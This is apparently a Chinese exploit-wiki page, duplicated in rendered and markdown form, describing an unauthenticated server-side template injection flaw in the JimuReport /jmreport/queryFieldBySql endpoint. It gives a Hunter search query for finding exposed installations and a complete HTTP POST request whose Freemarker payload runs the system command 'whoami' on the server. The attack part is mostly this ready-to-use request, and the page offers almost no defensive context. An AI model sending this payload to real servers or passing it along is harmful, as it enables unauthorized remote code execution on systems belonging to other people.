fofamini-wiki

登录白背景

源码

积木报表queryFieldBySql基于SSTI的任意代码执行漏洞

一、漏洞简介

积木报表 /jmreport/queryFieldBySql Api接口未进行身份校验，使用 Freemarker 处理用户用户传入的 sql 参数，未经授权的攻击者可发送包含恶意 sql 参数的 http 请求，通过 SSTI 在应用端执行任意代码。

二、影响版本

积木报表

三、资产测绘

hunterweb.body="积木报表"
特征

四、漏洞复现

POST /jmreport/queryFieldBySql HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Sign: AD0488642A880C68C8E3551C3BE0F6F5
X-TIMESTAMP: 1699726206096
X-Access-Token: null
token: null
JmReport-Tenant-Id: null
Content-Length: 128
Connection: close
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726144; Hm_lpvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726162

{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"whoami\") }'","dbSource":"","type":"0"}

原文: https://www.yuque.com/xiaokp7/ocvun2/tniy41yaokyeo68s

# 积木报表queryFieldBySql基于SSTI的任意代码执行漏洞

# 一、漏洞简介
积木报表 /jmreport/queryFieldBySql Api接口未进行身份校验，使用 Freemarker 处理用户用户传入的 sql 参数，未经授权的攻击者可发送包含恶意 sql 参数的 http 请求，通过 SSTI 在应用端执行任意代码。

# 二、影响版本

- 积木报表

# 三、资产测绘

- hunter`web.body="积木报表"`
- 特征

![image.png](./img/FzTNVj15TvfY6XBv/1699726567839-9854b1f5-2762-4970-87c2-fa030650673f-119378.png)

# 四、漏洞复现
```java
POST /jmreport/queryFieldBySql HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Sign: AD0488642A880C68C8E3551C3BE0F6F5
X-TIMESTAMP: 1699726206096
X-Access-Token: null
token: null
JmReport-Tenant-Id: null
Content-Length: 128
Connection: close
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726144; Hm_lpvt_5819d05c0869771ff6e6a81cdec5b2e8=1699726162

{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"whoami\") }'","dbSource":"","type":"0"}
```
![image.png](./img/FzTNVj15TvfY6XBv/1699726625557-788bd8a5-1182-4f3b-b6eb-1bfd5543a42e-789289.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tniy41yaokyeo68s>